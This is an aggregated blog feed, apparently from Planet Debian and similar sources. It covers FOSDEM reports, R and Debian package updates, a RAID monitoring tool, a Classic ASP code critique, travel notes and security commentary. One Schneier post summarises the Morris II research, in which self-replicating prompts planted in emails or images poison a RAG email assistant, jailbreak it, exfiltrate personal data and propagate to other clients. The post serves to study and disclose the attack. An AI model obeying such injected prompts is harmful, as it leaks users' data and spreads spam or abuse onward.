			catButtonArray[24].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[25].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth*5;
			catButtonArray[25].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			catButtonArray[26].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+60+keyWidth*6;
			catButtonArray[26].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+180;
			//SPACE
			catButtonArray[27].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+228;
			catButtonArray[27].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+240;
			//RETURN
			catButtonArray[28].x=catButtonArray[0].x-InitalKeyBoxWidth/2+keyWidth/2+558;
			catButtonArray[28].y=catButtonArray[0].y-InitalKeyBoxHeight/2+keyHeight/2+207;
			
			
			
			}
		}
[Advertisement] BuildMaster allows you to create a self-service release management platform that allows different teams to manage their applications. Explore how!

365 TomorrowsMandelbrot’s Monster

Author: Majoki “It’s not a case that we can’t see the fuckdam forest for the fuckdam trees,” Lipton spat as she whirled on Parrati, “because anywhere, anyhow we look at it that fuckdamn beast is waiting, ready to bite our fuckdamn heads off.” Parrati tapped slender fingers on the viewport and clucked. “Fuckdamn. That’s baby […]

The post Mandelbrot’s Monster appeared first on 365tomorrows.

,

Planet DebianPaulo Henrique de Lima Santana: Bits from FOSDEM 2023 and 2024

Link para versão em português

Intro

Since 2019, I have traveled to Brussels at the beginning of the year to join FOSDEM, considered the largest and most important Free Software event in Europe. The 2024 edition was the fourth in-person edition in a row that I joined (2021 and 2022 did not happen due to COVID-19) and always with the financial help of Debian, which kindly paid my flight tickets after receiving my request asking for help to travel and approved by the Debian leader.

In 2020 I wrote several posts with a very complete report of the days I spent in Brussels. But in 2023 I didn’t write anything, and becayse last year and this year I coordinated a room dedicated to translations of Free Software and Open Source projects, I’m going to take the opportunity to write about these two years and how it was my experience.

After my first trip to FOSDEM, I started to think that I could join in a more active way than just a regular attendee, so I had the desire to propose a talk to one of the rooms. But then I thought that instead of proposing a tal, I could organize a room for talks :-) and with the topic “translations” which is something that I’m very interested in, because it’s been a few years since I’ve been helping to translate the Debian for Portuguese.

Joining FOSDEM 2023

In the second half of 2022 I did some research and saw that there had never been a room dedicated to translations, so when the FOSDEM organization opened the call to receive room proposals (called DevRoom) for the 2023 edition, I sent a proposal to a translation room and it was accepted!

After the room was confirmed, the next step was for me, as room coordinator, to publicize the call for talk proposals. I spent a few weeks hoping to find out if I would receive a good number of proposals or if it would be a failure. But to my happiness, I received eight proposals and I had to select six to schedule the room programming schedule due to time constraints .

FOSDEM 2023 took place from February 4th to 5th and the translation devroom was scheduled on the second day in the afternoon.

Fosdem 2023

The talks held in the room were these below, and in each of them you can watch the recording video.

And on the first day of FOSDEM I was at the Debian stand selling the t-shirts that I had taken from Brazil. People from France were also there selling other products and it was cool to interact with people who visited the booth to buy and/or talk about Debian.


Fosdem 2023

Fosdem 2023

Photos

Joining FOSDEM 2024

The 2023 result motivated me to propose the translation devroom again when the FOSDEM 2024 organization opened the call for rooms . I was waiting to find out if the FOSDEM organization would accept a room on this topic for the second year in a row and to my delight, my proposal was accepted again :-)

This time I received 11 proposals! And again due to time constraints, I had to select six to schedule the room schedule grid.

FOSDEM 2024 took place from February 3rd to 4th and the translation devroom was scheduled for the second day again, but this time in the morning.

The talks held in the room were these below, and in each of them you can watch the recording video.

This time I didn’t help at the Debian stand because I couldn’t bring t-shirts to sell from Brazil. So I just stopped by and talked to some people who were there like some DDs. But I volunteered for a few hours to operate the streaming camera in one of the main rooms.


Fosdem 2024

Fosdem 2024

Photos

Conclusion

The topics of the talks in these two years were quite diverse, and all the lectures were really very good. In the 12 talks we can see how translations happen in some projects such as KDE, PostgreSQL, Debian and Mattermost. We had the presentation of tools such as LibreTranslate, Weblate, scripts, AI, data model. And also reports on the work carried out by communities in Africa, China and Indonesia.

The rooms were full for some talks, a little more empty for others, but I was very satisfied with the final result of these two years.

I leave my special thanks to Jonathan Carter, Debian Leader who approved my flight tickets requests so that I could join FOSDEM 2023 and 2024. This help was essential to make my trip to Brussels because flight tickets are not cheap at all.

I would also like to thank my wife Jandira, who has been my travel partner :-)

Bruxelas

As there has been an increase in the number of proposals received, I believe that interest in the translations devroom is growing. So I intend to send the devroom proposal to FOSDEM 2025, and if it is accepted, wait for the future Debian Leader to approve helping me with the flight tickets again. We’ll see.

Planet DebianDirk Eddelbuettel: tinythemes 0.0.2 at CRAN: Maintenance

A first maintenance of the still fairly new package tinythemes arrived on CRAN today. tinythemes provides the theme_ipsum_rc() function from hrbrthemes by Bob Rudis in a zero (added) dependency way. A simple example is (also available as a demo inside the package) contrasts the default style (on left) with the one added by this package (on the right):

This version mostly just updates to the newest releases of ggplot2 as one must, and takes advantage of Bob’s update to hrbrthemes yesterday.

The full set of changes since the initial CRAN release follows.

Changes in spdl version 0.0.2 (2024-03-04)

  • Added continuous integrations action based on r2u

  • Added demo/ directory and a READNE.md

  • Minor edits to help page content

  • Synchronised with ggplot2 3.5.0 via hrbrthemes

Courtesy of my CRANberries, there is a diffstat report relative to previous release. More detailed information is on the repo where comments and suggestions are welcome.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Cryptogram Surveillance through Push Notifications

The Washington Post is reporting on the FBI’s increasing use of push notification data—”push tokens”—to identify people. The police can request this data from companies like Apple and Google without a warrant.

The investigative technique goes back years. Court orders that were issued in 2019 to Apple and Google demanded that the companies hand over information on accounts identified by push tokens linked to alleged supporters of the Islamic State terrorist group.

But the practice was not widely understood until December, when Sen. Ron Wyden (D-Ore.), in a letter to Attorney General Merrick Garland, said an investigation had revealed that the Justice Department had prohibited Apple and Google from discussing the technique.

[…]

Unlike normal app notifications, push alerts, as their name suggests, have the power to jolt a phone awake—a feature that makes them useful for the urgent pings of everyday use. Many apps offer push-alert functionality because it gives users a fast, battery-saving way to stay updated, and few users think twice before turning them on.

But to send that notification, Apple and Google require the apps to first create a token that tells the company how to find a user’s device. Those tokens are then saved on Apple’s and Google’s servers, out of the users’ reach.

The article discusses their use by the FBI, primarily in child sexual abuse cases. But we all know how the story goes:

“This is how any new surveillance method starts out: The government says we’re only going to use this in the most extreme cases, to stop terrorists and child predators, and everyone can get behind that,” said Cooper Quintin, a technologist at the advocacy group Electronic Frontier Foundation.

“But these things always end up rolling downhill. Maybe a state attorney general one day decides, hey, maybe I can use this to catch people having an abortion,” Quintin added. “Even if you trust the U.S. right now to use this, you might not trust a new administration to use it in a way you deem ethical.”

Cryptogram The Insecurity of Video Doorbells

Consumer Reports has analyzed a bunch of popular Internet-connected video doorbells. Their security is terrible.

First, these doorbells expose your home IP address and WiFi network name to the internet without encryption, potentially opening your home network to online criminals.

[…]

Anyone who can physically access one of the doorbells can take over the device—no tools or fancy hacking skills needed.

Planet DebianColin Watson: Free software activity in January/February 2024

Two months into my new gig and it’s going great! Tracking my time has taken a bit of getting used to, but having something that amounts to a queryable database of everything I’ve done has also allowed some helpful introspection.

Freexian sponsors up to 20% of my time on Debian tasks of my choice. In fact I’ve been spending the bulk of my time on debusine which is itself intended to accelerate work on Debian, but more details on that later. While I contribute to Freexian’s summaries now, I’ve also decided to start writing monthly posts about my free software activity as many others do, to get into some more detail.

January 2024

  • I added Incus support to autopkgtest. Incus is a system container and virtual machine manager, forked from Canonical’s LXD. I switched my laptop over to it and then quickly found that it was inconvenient not to be able to run Debian package test suites using autopkgtest, so I tweaked autopkgtest’s existing LXD integration to support using either LXD or Incus.
  • I discovered Perl::Critic and used it to tidy up some poor practices in several of my packages, including debconf. Perl used to be my language of choice but I’ve been mostly using Python for over a decade now, so I’m not as fluent as I used to be and some mechanical assistance with spotting common errors is helpful; besides, I’m generally a big fan of applying static analysis to everything possible in the hope of reducing bug density. Of course, this did result in a couple of regressions (1, 2), but at least we caught them fairly quickly.
  • I did some overdue debconf maintenance, mainly around tidying up error message handling in several places (1, 2, 3).
  • I did some routine maintenance to move several of my upstream projects to a new Gnulib stable branch.
  • debmirror includes a useful summary of how big a Debian mirror is, but it hadn’t been updated since 2010 and the script to do so had bitrotted quite badly. I fixed that and added a recurring task for myself to refresh this every six months.

February 2024

  • Some time back I added AppArmor and seccomp confinement to man-db. This was mainly motivated by a desire to support manual pages in snaps (which is still open several years later …), but since reading manual pages involves a non-trivial text processing toolchain mostly written in C++, I thought it was reasonable to assume that some day it might have a vulnerability even though its track record has been good; so man now restricts the system calls that groff can execute and the parts of the file system that it can access. I stand by this, but it did cause some problems that have needed a succession of small fixes over the years. This month I issued DLA-3731-1, backporting some of those fixes to buster.
  • I spent some time chasing a console-setup build failure following the removal of kFreeBSD support, which was uploaded by mistake. I suggested a set of fixes for this, but the author of the change to remove kFreeBSD support decided to take a different approach (fair enough), so I’ve abandoned this.
  • I updated the Debian zope.testrunner package to 6.3.1.
  • openssh:
    • A Freexian collaborator had a problem with automating installations involving changes to /etc/ssh/sshd_config. This turned out to be resolvable without any changes, but in the process of investigating I noticed that my dodgy arrangements to avoid ucf prompts in certain cases had bitrotted slightly, which meant that some people might be prompted unnecessarily. I fixed this and arranged for it not to happen again.
    • Following a recent debian-devel discussion, I realized that some particularly awkward code in the OpenSSH packaging was now obsolete, and removed it.
  • I backported a python-channels-redis fix to bookworm. I wasn’t the first person to run into this, but I rediscovered it while working on debusine and it was confusing enough that it seemed worth fixing in stable.
  • I fixed a simple build failure in storm.
  • I dug into a very confusing cluster of celery build failures (1, 2, 3), and tracked the hardest bit down to a Python 3.12 regression, now fixed in unstable thanks to Stefano Rivera. Getting celery back into testing is blocked on the 64-bit time_t transition for now, but once that’s out of the way it should flow smoothly again.

Worse Than FailureCodeSOD: Classical Architecture

In the great olden times, when Classic ASP was just ASP, there were a surprising number of intranet applications built in it. Since ASP code ran on the server, you frequently needed JavaScript to run on the client side, and so many applications would mix the two- generating JavaScript from ASP. This lead to a lot of home-grown frameworks that were wobbly at best.

Years ago, Melinda inherited one such application from a 3rd party supplier.

<script type='text/javascript' language="JavaScript">

    var NoOffFirstLineMenus=3;                      // Number of first level items
    function BeforeStart(){return;}
    function AfterBuild(){return;}
    function BeforeFirstOpen(){return;}
    function AfterCloseAll(){return;}

    // Menu tree

<% If Session("SubSystem") = "IndexSearch" Then %>

    <% If Session("ReturnURL") = "" Then %>
        Menu1=new Array("Logoff","default.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Logoff");
    <% else %>
        Menu1=new Array("<%=session("returnalt")%>","returnredirect.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Return to Application");
        <% end if %>
        Menu2=new Array("Menu","Menu.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Menu");
        Menu3=new Array("Back","","",5,20,40,"","","","","","",-1,-1,-1,"","Back to Previous Pages");
        Menu3_1=new Array("<%= Session("sptitle") %>",<% If OWFeatureExcluded(Session("UserID"),"Web Index Search","SYSTEM","","")Then %>"","",0,20,130,"#33FFCC","#33FFCC","#C0C0C0","#C0C0C0","","","","","","",-1,-1,-1,"","<%= Session("sptitle") %>"); <% Else %>"SelectStorage.asp","",0,20,130,"","","","","","",-1,-1,-1,"","<%= Session("sptitle") %>");
    <% End If %>
    Menu3_2=new Array("Indexes","IndexRedirect.asp?<%= Session("ReturnQueryString")%>","",0,20,95,"","","","","","",-1,-1,-1,"","Enter Index Search Criteria");
    Menu3_3=new Array("Document List","DocumentList.asp?<%= Session("ReturnQueryString")%>","",0,20,130,"","","","","","",-1,-1,-1,"","Current Document List");
    Menu3_4=new Array("Document Detail",<% If OWFeatureExcluded(Session("UserID"),"Web Document Detail",Documents.Fields.Item("StoragePlace").Value,"","") Then %>"","",0,20,135,"#33FFCC","#33FFCC","#C0C0C0","#C0C0C0","","","","","","",-1,-1,-1,"","Document Details"); <% Else %>"DetailPage.asp?CounterKey=<%= Request.QueryString("CounterKey") %>","",0,20,135,"","","","","","",-1,-1,-1,"","Document Details");<% End If %>
    Menu3_5=new Array("Comments","Annotations.asp?CounterKey=<%= Request.QueryString("CounterKey") %>","",0,20,70,"","","","","","",-1,-1,-1,"","Document Comments");

<% Else %>

    <% If Session("ReturnURL") = "" Then %>
        Menu1=new Array("Logoff","default.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Logoff");
    <% else %>
    Menu1=new Array("<%=session("returnalt")%>","returnredirect.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Return to Application");
    <% end if %>
    Menu2=new Array("Menu","Menu.asp","",0,20,100,"","","","","","",-1,-1,-1,"","Menu");
    Menu3=new Array("Back","","",3,20,40,"","","","","","",-1,-1,-1,"","Back to Previous Pages");
    Menu3_1=new Array("Document List","SearchDocumentList.asp?<%= Session("ReturnQueryString") %>","",0,20,130,"","","","","","",-1,-1,-1,"","Current Document List");
    Menu3_2=new Array("Document Detail","DetailPage.asp?CounterKey=<%= Request.QueryString("CounterKey") %>","",0,20,135,"","","","","","",-1,-1,-1,"","Document Details");
    Menu3_3=new Array("Comments","Annotations.asp?CounterKey=<%= Request.QueryString("CounterKey") %>","",0,20,70,"","","","","","",-1,-1,-1,"","Document Comments");

<% End If %>

</script>

Here, the ASP code just provides some conditionals- we're checking session variables, and based on those we emit slightly different JavaScript. Or sometimes the same JavaScript, just to keep us on our toes.

The real magic is that this isn't the code that actually renders menu items, this is just where they get defined, and instead of using objects in JavaScript, we just use arrays- the label, the URL, the colors, and many other parameters that control the UI elements are just stuffed into an array, unlabeled. And then there are also the extra if statements, embedded right inline in the code, helping to guarantee that you can't actually debug this, because you can't understand what it's actually doing without really sitting down and spending time with it.

Of course, this application is long dead. But for Melinda, the memory lives on.

[Advertisement] ProGet’s got you covered with security and access controls on your NuGet feeds. Learn more.

365 TomorrowsBladesmith

Author: Julian Miles, Staff Writer Tallisandre peers at my dagger. “That’s a wicked stick you have there. I’ve never seen the like.” I hold it up so the light from the forge catches the square end of the blade, showing the third edge and double point where the single-sided long edges meet. “It’s called a […]

The post Bladesmith appeared first on 365tomorrows.

,

Planet DebianIustin Pop: New corydalis 2024.9.0 release!

Obligatory and misused quote: It’s not dead, Jim!

I’ve kind of dropped by ball lately on organising my own photo collection, but February was a pretty good month and I managed to write some more code for Corydalis, ending up with the aforementioned new release.

The release is not a big one, but I did manage to solve one thing that was annoying me greatly: that lack of ability to play videos inline in one of the two picture viewing modes (in my preferred mode, in fact). Now, whether you’re browsing through pictures, or looking at pictures one-by-one, you can in both cases play videos easily, and to some extent, “as it should be�. No user docs for that, yet (I actually need to split the manual in user/admin/developer parts)

I did some more internal cleanups, and I’ve enabled building release zips (since that’s how GitHub actions creates artifacts), which means it should be 10% easier to test this. The rest 90% is configuring it and pointing to picture folders and and and, so this is definitely not plug-and-play.

The diff summary between 2023.44.0 and 2024.9.0 is: 56 files changed, 1412 insertions(+), 700 deletions(-). Which is not bad, but also not too much. The biggest churn was, as expected, in the viewer (due to the aforementioned video playing). The “scary� part is that the TypeScript code is not at 7.9% (and a tiny more JS, which I can’t convert yet due to lack of type definitions upstream). I say scary in quotes, because I would actually like to know Typescript better, but no time.

The new release can be seen in action on demo.corydalis.io, and as always, just after release I found two minor issues:

  • The GitHub actions don’t retrieve the tags by default, actually they didn’t use to retrieve tags at all, but that’s fixed now, just needs configuration, so the public build just says “Corydalis fbe0088, built on Mar 3 2024.â€� (which is the correct hash value, at least).
  • I don’t have videos on the public web site, so the new functionality is not visible. I’m not sure I want to add real videos (size/bandwidth), hmm 🤨.

Well, there will be future releases. For now, I’ve made an open-source package release, which I didn’t do in a while, so I’m happy �. See you!

Planet DebianPetter Reinholdtsen: RAID status from LSI Megaraid controllers using free software

The last few days I have revisited RAID setup using the LSI Megaraid controller. These are a family of controllers called PERC by Dell, and is present in several old PowerEdge servers, and I recently got my hands on one of these. I had forgotten how to handle this RAID controller in Debian, so I had to take a peek in the Debian wiki page "Linux and Hardware RAID: an administrator's summary" to remember what kind of software is available to configure and monitor the disks and controller. I prefer Free Software alternatives to proprietary tools, as the later tend to fall into disarray once the manufacturer loose interest, and often do not work with newer Linux Distributions. Sadly there is no free software tool to configure the RAID setup, only to monitor it. RAID can provide improved reliability and resilience in a storage solution, but only if it is being regularly checked and any broken disks are being replaced in time. I thus want to ensure some automatic monitoring is available.

In the discovery process, I came across a old free software tool to monitor PERC2, PERC3, PERC4 and PERC5 controllers, which to my surprise is not present in debian. To help change that I created a request for packaging of the megactl package, and tried to track down a usable version. The original project site is on Sourceforge, but as far as I can tell that project has been dead for more than 15 years. I managed to find a more recent fork on github from user hmage, but it is unclear to me if this is still being maintained. It has not seen much improvements since 2016. A more up to date edition is a git fork from the original github fork by user namiltd, and this newer fork seem a lot more promising. The owner of this github repository has replied to change proposals within hours, and had already added some improvements and support for more hardware. Sadly he is reluctant to commit to maintaining the tool and stated in my first pull request that he think a new release should be made based on the git repository owned by hmage. I perfectly understand this reluctance, as I feel the same about maintaining yet another package in Debian when I barely have time to take care of the ones I already maintain, but do not really have high hopes that hmage will have time to spend on it and hope namiltd will change his mind.

In any case, I created a draft package based on the namiltd edition and put it under the debian group on salsa.debian.org. If you own a Dell PowerEdge server with one of the PERC controllers, or any other RAID controller using the megaraid or megaraid_sas Linux kernel modules, you might want to check it out. If enough people are interested, perhaps the package will make it into the Debian archive.

There are two tools provided, megactl for the megaraid Linux kernel module, and megasasctl for the megaraid_sas Linux kernel module. The simple output from the command on one of my machines look like this (yes, I know some of the disks have problems. :).

# megasasctl 
a0       PERC H730 Mini           encl:1 ldrv:2  batt:good
a0d0       558GiB RAID 1   1x2  optimal
a0d1      3067GiB RAID 0   1x11 optimal
a0e32s0     558GiB  a0d0  online   errs: media:0  other:19
a0e32s1     279GiB  a0d1  online  
a0e32s2     279GiB  a0d1  online  
a0e32s3     279GiB  a0d1  online  
a0e32s4     279GiB  a0d1  online  
a0e32s5     279GiB  a0d1  online  
a0e32s6     279GiB  a0d1  online  
a0e32s8     558GiB  a0d0  online   errs: media:0  other:17
a0e32s9     279GiB  a0d1  online  
a0e32s10    279GiB  a0d1  online  
a0e32s11    279GiB  a0d1  online  
a0e32s12    279GiB  a0d1  online  
a0e32s13    279GiB  a0d1  online  

#

In addition to displaying a simple status report, it can also test individual drives and print the various event logs. Perhaps you too find it useful?

In the packaging process I provided some patches upstream to improve installation and ensure a Appstream metainfo file is provided to list all supported HW, to allow isenkram to propose the package on all servers with a relevant PCI card.

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

Planet DebianDirk Eddelbuettel: RcppArmadillo 0.12.8.1.0 on CRAN: Upstream Fix, Interface Polish

armadillo image

Armadillo is a powerful and expressive C++ template library for linear algebra and scientific computing. It aims towards a good balance between speed and ease of use, has a syntax deliberately close to Matlab, and is useful for algorithm development directly in C++, or quick conversion of research code into production environments. RcppArmadillo integrates this library with the R environment and language–and is widely used by (currently) 1130 other packages on CRAN, downloaded 32.8 million times (per the partial logs from the cloud mirrors of CRAN), and the CSDA paper (preprint / vignette) by Conrad and myself has been cited 578 times according to Google Scholar.

This release brings a new upstream bugfix release Armadillo 12.8.1 prepared by Conrad yesterday. It was delayed for a few hours as CRAN noticed an error in one package which we all concluded was spurious as it could be reproduced outside of the one run there. Following from the previous release, we also use the slighty faster ‘Lighter’ header in the examples. And once it got to CRAN I also updated the Debian package.

The set of changes since the last CRAN release follows.

Changes in RcppArmadillo version 0.12.8.1.0 (2024-03-02)

  • Upgraded to Armadillo release 12.8.1 (Cortisol Injector)

    • Workaround in norm() for yet another bug in macOS accelerate framework
  • Update README for RcppArmadillo usage counts

  • Update examples to use '#include <RcppArmadillo/Lighter>' for faster compilation excluding unused Rcpp features

Courtesy of my CRANberries, there is a diffstat report relative to previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc should go to the rcpp-devel mailing list off the Rcpp R-Forge page.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianBen Hutchings: FOSS activity in February 2024

  • I updated the Linux kernel packages in various Debian suites:
    • buster: Updated linux-5.10 to the latest security update for bullseye, and uploaded it, but it still needs to be approved.
    • bullseye-backports: Updated linux (6.1) to the latest security update from bullseye, and uploaded it.
    • bookworm-backports: Updated linux to the current version in testing, and uploaded it.
  • I reported a regression in documentation builds in the Linux 5.10 stable branch.

Planet DebianPaul Wise: FLOSS Activities Feb 2024

Focus

This month I didn't have any particular focus. I just worked on issues in my info bubble.

Changes

Issues

Review

  • Spam: reported 1 Debian bug report
  • Debian BTS usertags: changes for the month

Administration

  • Debian BTS: unarchive/reopen/triage bugs for reintroduced packages: ovito, tahoe-lafs, tpm2-tss-engine
  • Debian wiki: produce HTML dump for a user, unblock IP addresses, approve accounts

Communication

  • Respond to queries from Debian users and contributors on the mailing lists and IRC

Sponsors

The SWH work was sponsored. All other work was done on a volunteer basis.

365 TomorrowsSenescence

Author: Peter Griffiths Elsie had heard some noise in the night, but hadn’t had the energy to get out of bed to see what it was. Now she could see splatters of paint on the window pane, grey on the grey of the cold morning light. The result was obvious even before she switched on […]

The post Senescence appeared first on 365tomorrows.

,

Planet DebianRavi Dwivedi: Malaysia Trip

Last month, I had a trip to Malaysia and Thailand. I stayed for six days in each of the countries. The selection of these countries was due to both of them granting visa-free entry to Indian tourists for some time window. This post covers the Malaysia part and Thailand part will be covered in the next post. If you want to travel to any of these countries in the visa-free time period, I have written all the questions asked during immigration and at airports during this trip here which might be of help.

I mostly stayed in Kuala Lumpur and went to places around it. Although before the trip, I planned to visit Ipoh and Cameron Highlands too, but could not cover it during the trip. I found planning a trip to Malaysia a little difficult. The country is divided into two main islands - Peninsular Malaysia and Borneo. Then there are more islands - Langkawi, Penang island, Perhentian and Redang Islands. Reaching those islands seemed a little difficult to plan and I wish to visit more places in my next Malaysia trip.

My first day hostel was booked in Chinatown part of Kuala Lumpur, near Pasar Seni LRT station. As soon as I checked-in and entered my room, I met another Indian named Fletcher, and after that we accompanied each other in the trip. That day, we went to Muzium Negara and Little India. I realized that if you know the right places to buy what you want, Malaysia could be quite cheap. Malaysian currency is Malaysian Ringgit (MYR). 1 MYR is equal to 18 INR. For 2 MYR, you can get a good masala tea in Little India and it costs like 4-5 MYR for a masala dosa. The vegetarian food has good availability in Kuala Lumpur, thanks to the Tamil community. I also tried Mee Goreng, which was vegetarian, and I found it fine in terms of taste. When I checked about Mee Goreng on Wikipedia, I found out that it is unique to Indian immigrants in Malaysia (and neighboring countries) but you don’t get it in India!

Mee Goreng, a dish made of noodles in Malaysia.

For the next day, Fletcher had planned a trip to Genting Highlands and pre booked everything. I also planned to join him but when we went to KL Sentral to take the bus, his bus tickets were sold out. I could take a bus at a different time, but decided to visit some other place for the day and cover Genting Highlands later. At the ticket counter, I met a family from Delhi and they wanted to go to Genting Highlands but due to not getting bus tickets for that day, they decided to buy a ticket for the next day and instead planned for Batu Caves that day. I joined them and went to Batu Caves.

After returning from Batu Caves, we went our separate ways. I went back and took rest at my hostel and later went to Petronas Towers at night. Petronas Towers is the icon of Kuala Lumpur. Having a photo there was a must. I was at Petronas Towers at around 9 PM. Around that time, Fletcher came back from Genting Highlands and we planned to meet at KL Sentral to head for dinner.

Me at Petronas Towers.

We went back to the same place as the day before where I had Mee Goreng. This time we had dosa and a masala tea. Their masala tea from the last day was tasty and that’s why I was looking for them in the first place. We also met a Malaysian family having Indian ancestry dining there and had a nice conversation. Then we went to a place to eat roti canai in Pasar Seni market. Roti canai is a popular non-vegetarian dish in Malaysia but I took the vegetarian version.

Photo with Malaysians.

The next day, we went to Berjaya Time Square shopping place which sells pretty cheap items for daily use and souveniers too. However, I bought souveniers from Petaling Street, which is in Chinatown. At night, we explored Bukit Bintang, which is the heart of Kuala Lumpur and is famous for its nightlife.

After that, Fletcher went to Bangkok and I was in Malaysia for two more days. Next day, I went to Genting Highlands and took the cable car, which had awesome views. I came back to Kuala Lumpur by the night. The remaining day I just roamed around in Bukit Bintang. Then I took a flight for Bangkok on 7th Feb, which I will cover in the next post.

In Malaysia, I met so many people from different countries - apart from people from Indian subcontinent, I met Syrians, Indonesians (Malaysia seems to be a popular destination for Indonesian tourists) and Burmese people. Meeting people from other cultures is an integral part of travel for me.

My expenses for Food + Accommodation + Travel added to 10,000 INR for a week in Malaysia, while flight costs were: 13,000 INR (Delhi to Kuala Lumpur) + 10,000 INR (Kuala Lumpur to Bangkok) + 12,000 INR (Bangkok to Delhi).

For OpenStreetMap users, good news is Kuala Lumpur is fairly well-mapped on OpenStreetMap.

Tips

  • I bought local SIM from a shop at KL Sentral station complex which had “news” in their name (I forgot the exact name and there are two shops having “news” in their name) and it was the cheapest option I could find. The SIM was 10 MYR for 5 GB data for a week. If you want to make calls too, then you need to spend extra 5 MYR.

  • 7-Eleven and KK Mart convenience stores are everywhere in the city and they are open all the time (24 hours a day). If you are a vegetarian, you can at least get some bread and cheese from there to eat.

  • A lot of people know English (and many - Indians, Pakistanis, Nepalis - know Hindi) in Kuala Lumpur, so I had no language problems most of the time.

  • For shopping on budget, you can go to Petaling Street, Berjaya Time Square or Bukit Bintang. In particular, there is a shop named I Love KL Gifts in Bukit Bintang which had very good prices. just near the metro/monorail stattion. Check out location of the shop on OpenStreetMap.

365 TomorrowsTo Savor

Author: Jordan Emilson “Make sure it has a name” Werner whispered to the darkened figure beside him, looming over the crib. In the blackness the room appeared in two dimensions: his, and the one his wife and child existed in across the floor. Her head turned, or at least it appeared to him as such […]

The post To Savor appeared first on 365tomorrows.

,

Cryptogram LLM Prompt Injection Worm

Researchers have demonstrated a worm that spreads through prompt injection. Details:

In one instance, the researchers, acting as attackers, wrote an email including the adversarial text prompt, which “poisons” the database of an email assistant using retrieval-augmented generation (RAG), a way for LLMs to pull in extra data from outside its system. When the email is retrieved by the RAG, in response to a user query, and is sent to GPT-4 or Gemini Pro to create an answer, it “jailbreaks the GenAI service” and ultimately steals data from the emails, Nassi says. “The generated response containing the sensitive user data later infects new hosts when it is used to reply to an email sent to a new client and then stored in the database of the new client,” Nassi says.

In the second method, the researchers say, an image with a malicious prompt embedded makes the email assistant forward the message on to others. “By encoding the self-replicating prompt into the image, any kind of image containing spam, abuse material, or even propaganda can be forwarded further to new clients after the initial email has been sent,” Nassi says.

It’s a natural extension of prompt injection. But it’s still neat to see it actually working.

Research paper: “ComPromptMized: Unleashing Zero-click Worms that Target GenAI-Powered Applications.

Abstract: In the past year, numerous companies have incorporated Generative AI (GenAI) capabilities into new and existing applications, forming interconnected Generative AI (GenAI) ecosystems consisting of semi/fully autonomous agents powered by GenAI services. While ongoing research highlighted risks associated with the GenAI layer of agents (e.g., dialog poisoning, membership inference, prompt leaking, jailbreaking), a critical question emerges: Can attackers develop malware to exploit the GenAI component of an agent and launch cyber-attacks on the entire GenAI ecosystem?

This paper introduces Morris II, the first worm designed to target GenAI ecosystems through the use of adversarial self-replicating prompts. The study demonstrates that attackers can insert such prompts into inputs that, when processed by GenAI models, prompt the model to replicate the input as output (replication), engaging in malicious activities (payload). Additionally, these inputs compel the agent to deliver them (propagate) to new agents by exploiting the connectivity within the GenAI ecosystem. We demonstrate the application of Morris II against GenAI-powered email assistants in two use cases (spamming and exfiltrating personal data), under two settings (black-box and white-box accesses), using two types of input data (text and images). The worm is tested against three different GenAI models (Gemini Pro, ChatGPT 4.0, and LLaVA), and various factors (e.g., propagation rate, replication, malicious activity) influencing the performance of the worm are evaluated.

Planet DebianGuido Günther: Free Software Activities February 2024

A short status update what happened last month. Work in progress is marked as WiP:

GNOME Calls

  • Landed support to pick emergency calls numbers based on location (until now Calls picked the numbers from the SIM card only): Merge Request
  • Bugfix: Fix dial back - the action mistakenly got disabled in some circumstances: Merge Request, Issue.

Phosh and Phoc

As this often overlaps I've put them in a common section:

Phosh Tour

Phosh Mobile Settings

Phosh OSK Stub

Livi Video Player

Phosh.mobi Website

  • Directly link to tarballs from the release page, e.g. here

If you want to support my work see donations.

Cryptogram Friday Squid Blogging: New Extinct Species of Vampire Squid Discovered

Paleontologists have discovered a 183-million-year-old species of vampire squid.

Prior research suggests that the vampyromorph lived in the shallows off an island that once existed in what is now the heart of the European mainland. The research team believes that the remarkable degree of preservation of this squid is due to unique conditions at the moment of the creature’s death. Water at the bottom of the sea where it ventured would have been poorly oxygenated, causing the creature to suffocate. In addition to killing the squid, it would have prevented other creatures from feeding on its remains, allowing it to become buried in the seafloor, wholly intact.

Research paper.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Planet DebianScarlett Gately Moore: Kubuntu: Week 4, Feature Freeze and what comes next.

First I would like to give a big congratulations to KDE for a superb KDE 6 mega release 🙂 While we couldn’t go with 6 on our upcoming LTS release, I do recommend KDE neon if you want to give it a try! I want to say it again, I firmly stand by the Kubuntu Council in the decision to stay with the rock solid Plasma 5 for the 24.04 LTS release. The timing was just to close to feature freeze and the last time we went with the shiny new stuff on an LTS release, it was a nightmare ( KDE 4 anyone? ). So without further ado, my weekly wrap-up.

Kubuntu:

Continuing efforts from last week Kubuntu: Week 3 wrap up, Contest! KDE snaps, Debian uploads. , it has been another wild and crazy week getting everything in before feature freeze yesterday. We will still be uploading the upcoming Plasma 5.27.11 as it is a bug fix release 🙂 and right now it is all about the finding and fixing bugs! Aside from many uploads my accomplishments this week are:

  • Kept a close eye on Excuses and fixed tests as needed. Seems riscv64 tests were turned off by default which broke several of our builds.
